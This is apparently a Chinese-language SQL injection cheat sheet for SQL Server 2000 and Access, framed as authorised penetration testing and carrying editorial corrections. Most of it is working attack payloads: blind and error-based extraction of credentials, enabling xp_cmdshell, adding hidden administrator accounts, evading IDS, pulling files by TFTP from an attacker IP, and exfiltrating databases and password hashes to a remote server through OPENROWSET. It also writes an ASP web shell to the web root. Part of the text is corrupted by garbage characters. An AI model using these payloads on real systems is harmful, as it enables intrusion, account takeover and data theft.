(以下内容仅用于授权范围内的渗透测试。大部分技巧针对 SQL Server 2000 时代的默认配置;2005 以后 xp_cmdshell、OLE Automation Procedures、Ad Hoc Distributed Queries 默认都是关闭的,且很多"报错回显"手法要求服务器把详细错误信息返回给客户端。)
1. 判断有无注入点:分别提交 and 1=1 和 and 1=2,两次返回页面不同即存在注入点
; and 1=1
; and 1=2
2. 猜表:一般的表名无非是 admin、adminuser、user、pass、password 等
and 0<>(select count(*) from 表名)
and 0<>(select count(*) from admin) --- 判断是否存在 admin 这张表(表不存在时查询出错,页面异常)
3. 猜帐号数目:如果 0< 返回正确页面、1< 返回错误页面,说明帐号数目就是 1 个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
猜列名还可以用 and (select count(列名) from 表名)>0 (列不存在时查询出错)
4. 猜解字段名称:在 len() 括号里填上猜测的字段名,字段不存在时查询出错
and 1=(select count(*) from admin where len(字段名)>0)--
and 1=(select count(*) from admin where len(name)>0)      --- 猜用户字段名 name
and 1=(select count(*) from admin where len(password)>0)  --- 猜密码字段名 password
(注意 1=(select count(*) ...) 的写法默认表里只有一行;多行时要加 where 条件或改用 top 1)
5. 猜解各个字段的长度:把 >0 换成不同的数,直到返回正确页面为止(同样假设表里只有一行)
and 1=(select count(*) from admin where len(字段名)>0)
and 1=(select count(*) from admin where len(name)>6)   错误
and 1=(select count(*) from admin where len(name)>5)   正确,长度是 6
and 1=(select count(*) from admin where len(name)=6)   正确

and 1=(select count(*) from admin where len(password)>11)  正确
and 1=(select count(*) from admin where len(password)>12)  错误,长度是 12
and 1=(select count(*) from admin where len(password)=12)  正确
猜长度还可以用 and (select top 1 len(username) from admin)>5 (不依赖表的行数)
6. 猜解字符(字符串要加单引号,原文的引号被论坛过滤掉了)
and 1=(select count(*) from admin where left(name,1)='a')  --- 猜解用户帐号的第一位
and 1=(select count(*) from admin where left(name,2)='ab') --- 猜解用户帐号的前两位
就这样一次加一个字符地猜,猜到刚才得到的长度为止,帐号就出来了。

猜内容还可以按字符编码二分:and (select top 1 asc(mid(password,1,1)) from admin)>50
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
注意 asc()/mid() 是 Access(Jet)的函数;SQL Server 下要换成 ascii(substring(pass,5,1))。
这种按编码逐位比较的方法也可以猜解中文的用户名和密码:把后面的数字换成对应的字符编码即可(SQL Server 下中文可用 unicode(substring(...)) 取码点),最后再把结果转换回字符。
group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
(利用 GROUP BY/HAVING 的报错信息逐列得到列名,需要错误回显)
; insert into users values( 666, 'attacker', 'foobar', 0xffff )--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id')--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id','login_name')--
UNION SELECT TOP 1 login_name FROM logintable--
UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'--
(原文一条语句里出现了两个 WHERE,第二个应为 AND;列名用 INFORMATION_SCHEMA.COLUMNS 的 COLUMN_NAME 列。这几条一般靠 UNION 类型不匹配的报错回显数据,同样依赖详细错误信息)
看服务器打的补丁:报错信息里会带出版本号(例如 SP4)
and 1=(select @@VERSION)--
(把 @@VERSION 字符串和整数比较会触发类型转换错误,错误信息里带出完整版本串;属于报错注入,需要错误回显)
看数据库连接账号的权限:返回正常,证明连接账号属于服务器角色 sysadmin
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--
判断连接数据库的帐号(用 SA 连接时返回正常 = 连接账号是 SA)
and 'sa'=(SELECT system_user)--
and user_name()='dbo'--
and 0<>(select user_name())--  (把用户名和整数比较,报错信息里直接带出用户名;原文少了一个右括号)
看 xp_cmdshell 是否被删除
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype='X' AND name='xp_cmdshell')--

xp_cmdshell 被删除后可以恢复(需要 sysadmin),也支持用绝对路径指定 dll:
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--
注意:SQL Server 2005 及以后 xp_cmdshell 默认是被禁用而不是删除,要用 sp_configure 打开:
;EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;--
反向 PING 自己做实验(通过 OLE 自动化调用 wscript.shell 执行命令;需要 sysadmin,2005 以后还要先打开 'Ole Automation Procedures' 选项;字符串参数用单引号,原文的双引号只在 QUOTED_IDENTIFIER OFF 时能用)
;use master;declare @s int;exec sp_oacreate 'wscript.shell',@s out;exec sp_oamethod @s,'run',NULL,'cmd.exe /c ping 192.168.0.1';--
加帐号(命令以 SQL Server 服务账号的身份运行,服务账号本身不是本机管理员时 net user 会失败)
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--
创建一个指向 E 盘的虚拟目录:
;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"'--
设置访问属性(配合写入一个 webshell):
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'
(mkwebdir.vbs / chaccess.vbs 是 IIS 的管理脚本,原文假定已放在 wwwroot 下,实际要改成真实路径)
MSSQL 也可以用联合查询(先用 order by N 或逐个加列确定原查询的列数;union 对 Access 也好用)
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
爆库特殊技巧(常见于 Access 站点):把请求路径里的 / 换成 %5c(即 \)提交,数据库驱动的报错信息会带出 .mdb 的完整路径
得到 WEB 路径
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--  (把字符串和整数比较,报错带出字段内容)
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(500) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots', @value_name='/', @value=@test OUTPUT insert into newtable(paths) values(@test)--
(原文把输出参数写成 values=@test、插入的表写成 paths(path),和前面建的 newtable 对不上;@test 也要足够长才放得下路径)
;use ku1;--
;create table cmd (str image);-- 建立 image 类型的表 cmd
存在 xp_cmdshell 时的测试过程:
;exec master..xp_cmdshell 'dir'
;exec master.dbo.sp_addlogin 'jiaoniang$';-- 加 SQL 帐号
;exec master.dbo.sp_password null,'1866574','jiaoniang$';-- (参数顺序是 旧密码,新密码,登录名;原文把后两个写反了)
;exec master.dbo.sp_addsrvrolemember 'jiaoniang$','sysadmin';--
;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$ /add';--
exec master..xp_servicecontrol 'start','schedule'  启动服务
exec master..xp_servicecontrol 'start','server'
; DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add'
; exec master..xp_cmdshell 'tftp -i 你的IP get file.exe'-- 利用 TFTP 上传文件
(以上加系统帐号、启动服务都以 SQL Server 服务账号执行,只有该账号本身是本机管理员或 LocalSystem 时才会成功)
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
;declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
;declare @a sysname;set @a=db_name();backup database @a to disk='\\你的IP\你的共享目录\bak.dat'  (原文 declare @a 缺少类型;备份到远程共享要求服务账号能写该 UNC 路径)
如果当前账号受限,可以通过 OPENROWSET 回连本机、用 sa 身份执行:
select * from openrowset('sqloledb','服务器名';'sa';'sa口令','select ''OK!''; exec master.dbo.sp_addlogin hax')
(前提是知道或猜到 sa 口令,原文假定 sa 为空口令;2005 以后还需要打开 'Ad Hoc Distributed Queries')
2 U. n8 F& x: w% z& c5 O7 C% [查询构造: # H O; O2 I8 a2 b% \) _: m2 r
SELECT * FROM news WHERE id=... AND topic=... AND .....
6 E$ [! s4 `: s* W9 h- ? I& Q" L7 g: madminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <> 8 Y$ N! a6 t: f4 j" _' p
select 123;-- " r5 ^ W4 X9 F9 y! [* x
;use master;-- 7 P& H3 F1 K2 ^9 U! x
:a or name like fff%;-- 显示有一个叫ffff的用户哈。
. ^( N% g# n% j) l8 z! b% Pand 1<>(select count(email) from [user]);--
; y, s/ _( s2 }5 V9 w( M7 r' p;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;-- / a& X6 A& ^* T; b' L) n1 G
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
2 |& t) V1 k( y3 n+ M4 p$ K;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
7 N3 m; `1 m: g, y: U) s;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
- _ m$ J+ ?$ k;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
9 ^3 C3 x) ]: X: y: t; B+ A;update [users] set email=(select top 1 name from password where id=2) where name=ffff;-- ' G& V2 p1 y, O0 E; e
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。 0 w' W2 @5 u( c. s
通过查看ffff的用户资料可得第一个用表叫ad # T2 C9 y" t- x) ^5 @: `! f7 @
然后根据表名ad得到这个表的ID 得到第二个表的名字
$ @) @! x& Y' B0 M) E, X
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--  (用 char() 拼出 'chris',绕过对单引号的过滤)
insert into users values( 667,123,123,0xffff)--
insert into users values ( 123, 'admin''--', 'password', 0xffff)--
;and user>0  (user 是返回当前用户名的内置函数,和整数比较会报错并带出用户名)
;and (select count(*) from sysobjects)>0   // SQL Server 有 sysobjects
;and (select count(*) from msysobjects)>0  // Access 的系统表是 MSysObjects(原文 mysysobjects 是笔误);Access 默认不允许读它,报"无读取权限"同样说明是 Access
枚举出数据表名
;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--
这是将第一个表名更新到 aaa 表的 aaa 字段处。
读出第一个表后,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名):
;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');--
然后 id=1552 and exists(select * from aaa where aaa>5)
(把 aaa 里的字符串和整数比较会报类型转换错误,错误信息里带出表名)一个个地读出来,直到没有为止。
读字段是这样:
;update aaa set aaa=(select top 1 col_name(object_id('表名'),1));--
然后 id=152 and exists(select * from aaa where aaa>5) 出错,得到第一个字段名
;update aaa set aaa=(select top 1 col_name(object_id('表名'),2));--
然后 id=152 and exists(select * from aaa where aaa>5) 出错,得到第二个字段名
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
update 表名 set 字段=(select top 1 name from sysobjects where xtype='u' and status>0 [ and name<>'你得到的表名',查出一个加一个]) [ where 条件]
或者:select top 1 name from sysobjects where xtype='u' and status>0 and name not in('table1','table2',…)
通过 SQL Server 注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须属于 sysadmin 角色]

[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
update 表名 set 字段=(select top 1 col_name(object_id('要查询的数据表名'),字段序号,如 1)) [ where 条件]
绕过 IDS 的检测[用变量拼接存储过程名,让签名匹配不到完整的 xp_cmdshell]
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
;declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
1、 开启远程数据库
基本语法
select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1')
参数:(1) OLEDB Provider name,(2) 连接字符串,(3) 在远程服务器上执行的查询
2、 其中连接字符串可以指定任意端口,比如
select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from table')
3. 复制目标主机的整个数据库:把所有远程表 insert 到本地表。
(OPENROWSET 即席查询在 2005 以后默认关闭,需要 sp_configure 'Ad Hoc Distributed Queries',1;而且目标机要能向外发起到 1433 端口的连接)
基本语法:
insert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1') select * from table2
这行语句将目标主机上 table2 表中的所有数据复制到远程数据库(测试者控制的 SQL Server)中的 table1 表中。实际运用中修改连接字符串的 IP 地址和端口,指向需要的地方,比如:
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table1') select * from table2
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysdatabases') select * from master.dbo.sysdatabases
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysobjects') select * from user_database.dbo.sysobjects
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _syscolumns') select * from user_database.dbo.syscolumns
(远程库上要先建好 _sysdatabases/_sysobjects/_syscolumns 等列结构一致的接收表)
复制数据库:
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table1') select * from database..table1
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table2') select * from database..table2
复制哈希表(HASH):登录密码的 hash 存储于 master 库的 sysxlogins 中(SQL Server 2000;2005 以后改为 sys.sql_logins 的 password_hash 列,需要 CONTROL SERVER 权限才能读到)。方法如下:
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysxlogins') select * from master.dbo.sysxlogins
得到 hash 之后,就可以离线暴力破解。
遍历目录的方法:先创建一个临时表 temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器(返回 4 列,和 temp 的列数一致)
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构,并存入 temp 表中
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看某个文件的内容
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc';--  (列出 IIS 站点配置,可从中找到网站根目录)
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- (xp_dirtree 对 PUBLIC 角色可用,不需要 sysadmin)
之后用报错或盲注逐行读出 temp 表的内容。
判断当前连接账号属于哪些服务器角色/数据库角色(返回正常 = 属于该角色):
语句1:and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
语句2:and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
语句3:and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
语句4:and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
语句5:and 1=(SELECT IS_SRVROLEMEMBER('processadmin'));--
语句6:and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
语句7:and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
语句8:and 1=(SELECT IS_SRVROLEMEMBER('dbcreator'));--
语句9:and 1=(SELECT IS_MEMBER('db_owner'));--
(原文语句5、语句8 分别重复了 securityadmin 和 bulkadmin;固定服务器角色共 8 个,这里补上缺掉的 processadmin 和 dbcreator)
把路径写到表中去:
;create table dirs(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree 'c:\'--
and 0<>(select top 1 paths from dirs)--
and 0<>(select top 1 paths from dirs where paths not in('Inetpub'))--  (逐个排除已读出的目录名;目录名字符串和 0 比较靠报错带出内容)
;create table dirs1(paths varchar(100), id int)--
;insert dirs1 exec master.dbo.xp_dirtree 'e:\web'--  (原文写成了 insert dirs,和下一句读的 dirs1 对不上)
and 0<>(select top 1 paths from dirs1)--
把数据库备份到网页目录,然后直接下载:
;declare @a sysname; set @a=db_name();backup database @a to disk='e:\web\down.bak';--
(要求 SQL Server 服务账号对网站目录有写权限,且 Web 服务器允许下载 .bak 文件;备份文件未加密时可以直接从中搜索出表内容)
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)  (char(85)='U',用来绕过单引号过滤;和整数比较靠报错带出第 12 个用户表的名字)
and 1=(Select Top 1 col_name(object_id('USER_LOGIN'),1) from sysobjects) 查看相关表的字段。
and 1=(select user_id from USER_LOGIN)
and 0=(select user from USER_LOGIN where user>1)
-=- wscript.shell example -=-
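-- Spawn a process on the database host through OLE Automation (sp_oacreate / sp_oamethod).
-- Requires sysadmin; on SQL Server 2005+ the 'Ole Automation Procedures' option must be enabled.
-- String arguments must be quoted -- the forum stripped the quotes from the original.
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
-- release the COM object instead of leaking it for the life of the connection
exec sp_oadestroy @o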
; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--  (上面例子的单行注入写法)
通过 Scripting.FileSystemObject 逐行读取服务器上的文件(需要 sysadmin;2005 以后需先打开 'Ole Automation Procedures'):
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
(读到文件末尾时 readline 出错、@ret 变为非 0,循环结束;print 的输出一般只在直接连库时可见,注入场景下要改成写入表再读出)
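-- Drop a one-line ASP web shell into the IIS web root via Scripting.FileSystemObject.
-- createtextfile(path, 1): the 1 means overwrite an existing file.
-- The page written here runs whatever is passed in ?cmd= under the IIS worker account;
-- remove it from the target as soon as the test is over.
declare @o int, @f int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'
-- release the file and FSO objects
exec sp_oadestroy @f
exec sp_oadestroy @o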
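-- speech.voicetext demo: makes the server speak through OLE Automation.
-- A harmless proof that the connection has sysadmin and OLE Automation is enabled.
-- waitfor keeps the batch alive so the speech is not cut off when the object is released.
declare @o int, @ret int
exec sp_oacreate 'speech.voicetext', @o out
exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'
exec sp_oasetproperty @o, 'speed', 150
exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528
waitfor delay '00:00:05'
exec sp_oadestroy @o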
; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528 waitfor delay '00:00:05'--
xp_dirtree 对 PUBLIC 角色可用(不需要 sysadmin)
exec master.dbo.xp_dirtree 'c:\' 返回的结果集有两个字段 subdirectory、depth。subdirectory 字段是字符型,depth 字段是整型。
create table dirs(paths varchar(100), id int)
建表:这里建的表要和上面 xp_dirtree 的返回结果相对应,字段数相等、类型相同。
insert dirs exec master.dbo.xp_dirtree 'c:\'
只要我们建的表与存储过程返回的字段定义一致,insert ... exec 就能执行,达到写表的效果,再一步步读出我们想要的信息。